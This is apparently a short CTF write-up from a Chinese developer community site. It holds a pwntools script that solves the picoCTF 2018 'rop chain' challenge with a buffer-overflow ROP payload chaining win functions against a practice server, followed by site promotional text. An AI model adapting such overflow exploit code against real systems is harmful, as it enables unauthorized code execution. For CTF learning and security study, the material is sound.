picoctf_2018_rop chain
expfrom pwn import *context.log_level = 'debug'proc_name = './PicoCTF_2018_rop_chain'p = remote('node3.buuoj.cn', 27027)elf = ELF(proc_name)flag_addr = elf.sym['flag']win_function1 = elf.sym['win_func
·
exp
from pwn import *
context.log_level = 'debug'
proc_name = './PicoCTF_2018_rop_chain'
p = remote('node3.buuoj.cn', 27027)
elf = ELF(proc_name)
flag_addr = elf.sym['flag']
win_function1 = elf.sym['win_function1']
win_function2 = elf.sym['win_function2']
main_addr = elf.sym['main']
payload = b'a' * (0x18 + 4) + p32(win_function1) + p32(win_function2) + p32(flag_addr) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
p.sendlineafter('input>', payload)
p.recv()
p.recv()
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
0
0- 0
已为社区贡献7条内容
所有评论(0)